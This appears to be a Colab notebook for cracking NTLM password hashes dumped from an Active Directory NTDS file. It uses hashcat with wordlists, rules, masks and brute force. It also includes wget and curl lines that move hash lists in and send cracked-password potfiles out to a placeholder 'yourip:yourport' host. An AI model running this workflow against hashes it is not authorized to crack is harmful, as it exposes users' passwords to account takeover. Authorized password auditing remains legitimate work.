# Nephelees - NTDS cracking on Google Colab

0. Open the `ipynb` file by clicking on the button **Open in Colab**
1. Select **Runtime**, **Change runtime type**, and set **Hardware accelerator** to **GPU**.    
2. Select **Runtime**" and **Run all"** !
3. On your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists
4. Upload your anonymized hashes list on the colab `!wget http://yourip:yourport/yourfile` or with the upload button
5. Install requirements (hashcat + wordlists + rules)
6. Run hashcat commands
7. Recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/` or download the file from the explorer in the left side of the panel.
8. On your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username example.ntds wordlists/rockyou.txt`


**/!\** For every 12hrs or so Disk, RAM, VRAM, CPU cache etc data that is on our alloted virtual machine will get erased. 

In [1]:
# Check GPU (Tesla P100 is the best GPU on Colab)
!nvidia-smi -L

GPU 0: Tesla T4 (UUID: GPU-343fa569-5e31-ae7a-e549-7a7375f44639)


In [ ]:
# Install Hashcat
!apt install cmake build-essential -y
!apt install checkinstall git -y
!git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install

In [ ]:
# Download wordlists
import os
wordlists_dir = "wordlists"
os.system("wordlists_dir={}".format(wordlists_dir))
!mkdir ./$wordlists_dir

!printf "[+] Downloading the Rockyou wordlist...\n"
!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz
!printf "[+] Wordlist downloaded !\n[+] Extraction...\n"
!cd $wordlists_dir && gunzip rockyou.txt.gz && rm rockyou.txt.gz
!printf "[+] Finished !\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)"

!printf "[+] Downloading the KerberoastPW wordlist...\n"
!cd $wordlists_dir && wget https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz
!printf "[+] Wordlist downloaded !\n[+] Extraction...\n"
!cd $wordlists_dir && unxz kerberoast_pws.xz && rm kerberoast_pws.xz
!printf "[+] Finished !\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep kerberoast_pws)"

!printf "[+] Downloading the HashesOrg2019 wordlist...\n"
!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz
!printf "[+] Wordlist downloaded !\n[+] Extraction...\n"
!cd $wordlists_dir && gunzip hashesorg2019.gz && rm hashesorg2019.gz
!printf "[+] Finished !\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)"

# !printf "[+] Downloading the Have I been Pwned V7 wordlist...\n"
# !cd $wordlists_dir && wget https://hashes.org/download.php?type=found&hashlistId=8161 -O 	HaveIbeenPwnedV7.txt
# !printf "[+] Wordlist downloaded !\n[+]\n"
# !printf "[+] Finished !\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep HaveIbeenPwnedV7)"

# 28 GB / https://download.weakpass.com/wordlists/1863/weakpass_2.gz
# https://github.com/danielmiessler/SecLists/raw/5c9217fe8e930c41d128aacdc68cbce7ece96e4f/Passwords/Keyboard-Combinations.txt

In [ ]:
# Download rules
import os
rules_dir = "/content/hashcat/rules"
os.system("rules_dir={}".format(rules_dir))
!mkdir ./$rules_dir

!printf "[+] Downloading the hob064 ruleset...\n"
!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule
!printf "[+] Rules downloaded !\n"
!printf "[+] Location : $(ls $rules_dir | grep hob064)"

!printf "[+] Downloading the d3adhob0 ruleset...\n"
!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule
!printf "[+] Rules downloaded !\n"
!printf "[+] Location : $(ls $rules_dir | grep d3adhob0)"

In [ ]:
# 2. Download your hashfile from your machine
# for OPSEC reasons, please don't paste your hashes on a pastebin
# use ngrok (https://ngrok.com/) + updog (https://github.com/sc0tfree/updog) instead if you don't have a public IP address
!wget https://YOURLISTENERIP:YOURPORT/YOURFILE

In [ ]:
# 3. Crack your hashes

# Quick cracking - rockyou wordlist - around 10 minutes
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/hob064.rule --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/d3adhob0.rule --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/dive.rule --username

# Medium cracking - kerberoast wordlist - around 30 minutes
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/hob064.rule --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/d3adhob0.rule --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/dive.rule --username

# Insane cracking - hashesorg2019 wordlist - 2min + 8 min + 3h + 6h
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/hob064.rule --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/d3adhob0.rule --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/dive.rule --username

In [ ]:
# 4. More cracking materials
import os
pack_dir = "pack"
os.system("pack_dir={}".format(pack_dir))
!mkdir ./$pack_dir

!cd $pack_dir && wget https://raw.githubusercontent.com/iphelix/pack/master/statsgen.py
!cd $pack_dir && wget https://raw.githubusercontent.com/iphelix/pack/master/maskgen.py
!python2 $pack_dir/statsgen.py cracked.pot -o $pack_dir/hashcat.mask
!python2 $pack_dir/maskgen.py $pack_dir/hashcat.mask --targettime 3600 --optindex -q -o $pack_dir/hashcat_1H.hcmask
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 3 /content/*.ntds $pack_dir/hashcat_1H.hcmask

In [ ]:
# 5. Wikipedia list
!apt install hydra -y
!cd /content/wordlists && wget http://download.wikimedia.org/nowiki/latest/nowiki-latest-pages-articles.xml.bz2
!cd /content/wordlists && bzcat nowiki-latest-pages-articles.xml.bz2 | grep '^[a-zA-Z]' | sed 's/[-_:.,;#@+?{}()&|§!¤%`<>="\/]/\ /g' | tr ' ' '\n' | sed 's/[0-9]//g' | sed 's/[^A-Za-z0-9]//g' | sed -e 's/./\L\0/g' | sed 's/[^abcdefghijklmnopqrstuvwxyzæøå]//g' | sort -u | pw-inspector -m1 -M20 > nowiki.lst
!cd /content/wordlists && wc -l nowiki.lst

!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/hob064.rule --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/d3adhob0.rule --username
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/nowiki.lst --rules-file /content/hashcat/rules/dive.rule --username

In [ ]:
# 6. Full bruteforce for 8/9 characters and compliance masks

# Mask: upper*1+lower*5+digit*2 and upper*1+lower*6+digit*2 
# ---- around 3 minutes on a T4 -----
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?d?d
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?l?d?d 
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?l?d?d?1
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?l?l?d?d?1 

# Mask: upper*1+lower*3+digit*4 and upper*1+lower*3+digit*4
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?d?d?d?d
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?d?d?d?d
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?d?d?d?d
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?d?d?d?d?1
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?d?d?d?d?1

# Mask: lower*6 + digit*2 + special digit(+!?*)
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?l?l?l?l?l?l?d?d?1
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?l?l?l?l?l?l?d?d?1?1

# ---- around 3 hours on a T4 -----
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?l?d?d?d?d

# ----- around 3 hours on a P100 ------
# lower*6 + digit*2
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 /content/hashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask
!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1

# # ----- more than 3 days on a P100 --------
# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a 
# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a